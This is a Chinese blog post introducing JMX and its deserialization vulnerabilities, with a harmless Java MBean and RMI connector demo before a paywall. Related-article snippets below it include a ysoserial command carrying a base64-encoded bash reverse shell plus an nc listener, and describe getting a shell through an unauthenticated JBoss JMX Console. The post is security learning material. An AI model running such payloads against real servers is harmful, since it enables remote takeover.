JMX 反序列化漏洞

最新推荐文章于 2025-03-19 17:44:28 发布
最新推荐文章于 2025-03-19 17:44:28 发布
阅读量1.1k 收藏 15
点赞数 9
文章标签: jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CTZL123456/article/details/140552533
版权

前言

前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。

JMX 基础

JMX 前置知识

JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。JMX 可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用。

可以简单理解 JMX 是 java 的一套管理框架,coders 都遵循这个框架,实现对代码应用的监控与管理。

JMX 的结构一共分为三层:

1、基础层:主要是 MBean,被管理的资源。分为四种,常用需要关注的是两种。

  • standard MBean 这种类型的 MBean 最简单,它能管理的资源(包括属性、方法、时间)必须定义在接口中,然后 MBean 必须实现这个接口。它的命令也必须遵循一定的规范,例如我们的 MBean 为 Hello,则接口必须为 HelloMBean。

  • dynamic MBean 必须实现 javax.management.DynamicMBean 接口,所有的属性,方法都在运行时定义。2、适配层:MBeanServer,主要是提供对资源的注册和管理。3、接入层:Connector,提供远程访问的入口。

JMX 基础代码实践

以下代码实现简单的 JMX demo,文件结构

 

代码解读
 

复制代码
 

├── HelloWorld.java ├── HelloWorldMBean.java └── jmxDemo.java 
 

HelloWorldMBean.java
 

 

csharp
 

代码解读
 

复制代码
 

package org.example;​public interface HelloWorldMBean { public void sayhello(); public int add(int x, int y); public String getName();}​ 
 

HelloWorld.java
 

 

java
 

代码解读
 

复制代码
 

package org.example;​public class HelloWorld implements HelloWorldMBean{ private String name = "Drunkbaby"; @Override public void sayhello() { System.out.println("hello world" + this.name); }​ @Override public int add(int x, int y) { return x + y; }​ @Override public String getName() { return this.name; }}​ 
 

jmxDemo.java
 

 

java
 

代码解读
 

复制代码
 

package org.example;​import javax.management.MBeanServer;import javax.management.ObjectName;import javax.management.remote.JMXConnectorServer;import javax.management.remote.JMXConnectorServerFactory;import javax.management.remote.JMXServiceURL;import java.lang.management.ManagementFactory;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;​public class jmxDemo { public static void main(String[] args) throws Exception{ MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer(); ObjectName mbsName = new ObjectName("test:type=HelloWorld"); HelloWorld mbean = new HelloWorld(); mBeanServer.registerMBean(mbean, mbsName);​ // 创建一个 RMI Registry Registry registry = LocateRegistry.createRegistry(1099); // 构造 JMXServiceURL,绑定创建的 RMI JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi"); // 构造JMXConnectorServer,关联 mbserver JMXConnectorServer jmxConnectorServer = JMXConnectorServerFactory.newJMXConnectorServer(jmxServiceURL, null, mBeanServer); jmxConnectorServer.start(); System.out.println("JMXConnectorServer is ready");​ System.out.println("press any key to exit."); System.in.read();​ }}​ 
 

其中
 

    
 
  •  
    Probe Level:创建了 HelloWorldMBean 实例 mbean
     
    • 
 
  •  
    Agent Level:创建了 MBeanServer 实例 mbs
     
    • 
 
  •  
    Remote Management Level: 创建了JMXServiceURL,绑定到本地 1099 rmi
    • 


                

        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        


    


                



	

		

			

				
					
漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)

				
			

			

				

					晚风不及你
				

				

					01-05
					
					737
					
				

			

		

		

			
				
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。

			
		

	



                

            
              



	

		

			

				
					
普元EOS Platform远程代码执行漏洞复现(XVE-2023-24691)

				
			

			

				

					0xSec
				

				

					04-24
					
					2288
					
				

			

		

		

			
				
普元EOS Platform 中间件 任意 .jmx或者.download 后缀的接口存在反序列化漏洞,未经身份验证的攻击者可利用此漏洞执行任意代码,反弹shell或者写入后门文件,进一步可获取服务器权限。

			
		

	



              


  
              

                


	

		

			

				
					
Apache James JMX本地反序列化漏洞(CVE-2023-26269)

				
			

			

				

					murphysec的博客
				

				

					04-04
					
					798
					
				

			

		

		

			
				
Apache James 是一个基于Java语言开发的邮件服务器软件。

该项目受影响版本存在权限提升漏洞,由于Apache James 3.7.3及之前版本默认提供无需身份验证的 JMX 管理服务且使用LOG4J MBeans接口等导致存在反序列化漏洞。具备本地用户权限的攻击者可通过Log4j MBeans接口或CommonsBeanutils1链触发反序列化造成任意命令执行,由于JMX 管理服务仅在本地主机开放,漏洞在大部分场景中只能用于本地权限提升。

			
		

	





	

		

			

				
					
Java JMX 未授权访问漏洞分析与修复指南

					
最新发布

				
			

			

				

					虽非技冠群英首,愿与同道共长歌; 大鹏一日同风起,扶摇直上九万里;
				

				

					03-19
					
					753
					
				

			

		

		

			
				
Java JMX 未授权访问漏洞分析与修复指南

			
		

	



		

			
		



	

		

			

				
					
JexBoss反序列化漏洞(JMXInvokerServlet)

				
			

			

				

					红队是青春
				

				

					05-26
					
					963
					
				

			

		

		

			
				
## jexboss(JMXInvokerServlet)原理

JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码,可以利用用户传入的方法,反弹shell,拿下服务器权限。

```python
exp下载地址:https://github.com/joaomatosf/jexboss
```

## 影响范围

JBoss Enterprise Appl.

			
		

	





	

		

			

				
					
java jmx agent不安全的配置漏洞

				
			

			

				

					Innocence_0的博客
				

				

					02-23
					
					2052
					
				

			

		

		

			
				
Java JMX(Java Management Extensions)是一套由SunMicrosystems(现在为Oracle公司)提供的管理Java应用程序的API,使得开发人员可以通过该API,在应用程序运行过程中获取和修改应用程序在JVM上的各种信息和状态。但是如果JMXAgent的配置存在不当,则可能会导致安全问题。

			
		

	





	

		

			

				
					
JBoss JMXInvokerServlet 反序列化漏洞

				
			

			

				

					EC_Carrot的博客
				

				

					07-04
					
					218
					
				

			

		

		

			
				
漏洞复现
首先用ysoserial工具生成一条poc
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

使用nc -lvp命令来监听端口,并将生成的poc.ser文件作为POST的body发到/invoker/readonly
curl http

			
		

	





	

		

			

				
					
JAVA反序列化漏洞知识点整理

				
			

			

				

					01-20
				

			

		

		

			
				
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。 	 JAVA反序列化漏洞 	 反序列化漏洞的...

			
		

	





	

		

			

				
					
JMX-RMI反序列化中的小研究

				
			

			

				

					xxsiyao的博客
				

				

					07-14
					
					688
					
				

			

		

		

			
				
简述

RMI 数据传输基于反序列化,如果服务中实现了 RMI 的调用且具有 Object
类型参数,那么就会造成反序列化(实际攻击中需要反序列化链)
JMX 服务是基于 RMI 实现,且将凭证对象作为Object 参数传入,如果使用恶意构造的对象替代凭证传入,是否能攻击需要凭证认证的
JMX 服务了。

针对 JMX 的攻击

YSO 中有一个针对 JMX 的攻击模块,当 JMX 服务器存在反序列化链时,可以对JMX服务进行攻击

java -cp ysoserial.jar ysoserial.expl

			
		

	





	

		

			

				
					
Apache Solr JMX服务远程代码执行漏洞复现

				
			

			

				

					Sylon的博客
				

				

					11-25
					
					1848
					
				

			

		

		

			
				
##0x00 漏洞介绍
该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。
Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。
如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默...

			
		

	





	

		

			

				
					
javaRMI反序列化漏洞验证工具

				
			

			

				

					08-21
				

			

		

		

			
				
检测javaRMI反序列化漏洞

			
		

	





	

		

			

				
					
你知道怎么攻击JMX吗?

				
			

			

				

					dzqxwzoe的博客
				

				

					12-30
					
					1013
					
				

			

		

		

			
				
JMX(Java Management Extensions,即Java管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。狭隘的理解,我们可以通过JMX管理、监视我们的java程序。但是不是所有java程序都能被管理,只有通过特定实现的java才能够被管理,这种特定实现机制就是Mbean。如上所属,利用JMX我们可以控制服务端的特定java程序,具体能够控制哪些java程序,又是如何控制的呢?我们还是用一些小demo来说明。能够被JMX控制的一种java程序被叫做MBean。

			
		

	





	

		

			

				
					
JMX Console 未授权访问漏洞

				
			

			

				

					懂进攻知防守
				

				

					07-23
					
					5785
					
				

			

		

		

			
				
Jboss的webUI界面http//ipport/jmx-console未授权访问(或默认密码admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell。

			
		

	





	

		

			

				
					
Jboss漏洞(⾼版本JMX Console未授权)

				
			

			

				

					qq_68186313的博客
				

				

					08-07
					
					360
					
				

			

		

		

			
				
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏ 远程部署。3、然后输⼊Invoke。

			
		

	





	

		

			

				
					
致远 JNDI反序列化漏洞

				
			

			

				

					01-01
				

			

		

		

			
				
### 致远 JNDI 反序列化漏洞详情

在致远协同管理平台中存在JNDI反序列化漏洞,此漏洞允许远程攻击者通过精心构造的数据包执行任意代码。当应用程序尝试解析不受信任的输入并将其作为对象流处理时,如果这些数据被用于查找或创建资源,则可能触发恶意行为[^1]。

具体来说,在Java环境中,`javax.naming.InitialContext.lookup()`方法会根据传入的名字查询相应的服务提供者接口(SPI),而这个过程中可能会加载来自网络位置(如LDAP服务器)的对象定义文件。一旦攻击者能够控制这部分URL的内容,就可以诱导受害主机下载并实例化由攻击者指定的类,从而实现远程命令执行。

#### 解决方案

针对上述风险,建议采取以下措施:

- **升级版本**:确保使用的致远产品是最新的稳定版,因为厂商通常会在新版本中修复已知的安全问题。
  
- **禁用不必要的功能**:对于不必要启用的功能模块应予以关闭,减少潜在的风险暴露面。
    
- **配置安全策略**:调整应用服务器的相关设置,比如限制RMI注册表访问权限、禁止外部连接到本地JMX端口等,以此降低利用此类漏洞的可能性。

- **依赖库更新**:定期审查第三方组件及其版本号,及时替换含有公开CVE编号的老化库项;特别是像Apache Commons Collections这样的常用工具集,历史上曾多次暴露出可被用来实施反序列化攻击的缺陷。

- **白名单机制**:引入严格的类加载器过滤规则,只允许特定路径下的可信字节码参与运行时环境中的动态加载流程,从根本上杜绝非法类型的注入途径。

```java
// 设置JVM参数以增强安全性
-Dcom.sun.jndi.rmi.object.trustURLCodebase=false \
-Dcom.sun.jndi.cosnaming.object.trustURLCodebase=false \
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值